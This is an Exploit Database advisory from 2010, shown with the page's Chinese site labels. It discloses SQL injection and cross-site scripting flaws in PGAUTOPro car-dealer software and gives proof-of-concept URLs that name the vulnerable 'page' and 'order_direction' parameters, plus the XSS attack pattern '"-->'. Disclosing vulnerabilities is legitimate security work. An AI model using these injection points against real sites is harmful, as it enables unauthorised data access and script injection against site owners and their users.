PGAUTOPro – SQL Injection / Cross-Site Scripting (1)

• Exploit Database
• 11 阅读

• 作者： Sid3^effects
  日期： 2010-06-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/13786/

• =======================================
  PGAUTOPro SQLi and XSS Vulnerability
  =======================================
  1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  0 _ __ __ __ 1
  1 /' \__/'__`\/\ \__/'__`\ 0
  0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1
  1\/_/\ \ /' _ `\ \/\ \/_/_\_<_/'___\ \ \/\ \ \ \ \/\`'__\0
  0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
  1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
  0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1
  1\ \____/ >> Exploit database separated by exploit 0
  0 \/___/type (local, remote, DoS, etc.)1
  11
  0[+] Site: Inj3ct0r.com0
  1[+] Support e-mail: submit[at]inj3ct0r.com1
  00
  1 ########################################## 1
  0 I'm Sid3^effects member from Inj3ct0r Team 1
  1 ########################################## 0
  0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
  
  Name : PGAUTOPro SQLi and XSS Vulnerability
  Date : june, 9 2010
  Vendor url :http://www.pgautopro.com/
  Platform: Linux,Windows
  Price: AUD$450
  Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
  special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
  greetz to :All ICW members.
  
  ###############################################################################################################
  Description:
  
  Full Featured Car Dealer Inventory Software - PG Auto Pro
  Our Software Solution will meet the requirements of Private Auto Dealers, Auto Dealership Companies and other Enterprises selling Vehicles.
  
  The Software fundamental features will help starting your own Auto Classifieds Website:
  - huge vehicles database with 3000 Models approximately
  - possibility to add any new car that's missing in the database
  - a powerful option of monetizing auto website - charging users for paid packages and additional services, selling banner places to 
  
  advertisirs, placing your own AdSense contextual ads will let you derive profit from the site
  - a good chance for Car Dealers to sell their autos faster than before due to the comprehensive search options on the site.
  ###############################################################################################################
  
  Xploit: SQLi Vulnerability
  
  DEMO
  
  URL:http://[site]/vehicle/buy_do_search/?order_direction=DESC&&status=1&form_gid=vehicle_user_quick_search_new&back_module=vehicl
  
  e%2Fbuy_do_search&page=[SQLi]
  
  ###############################################################################################################
  Xploit: XSS Vulnerability
  
  Attack Pattern: '"-->
  
  http://[site]/vehicle/buy_do_search/?order_direction=[XSS]
  
  
  ###############################################################################################################
  # 0day no more 
  # Sid3^effects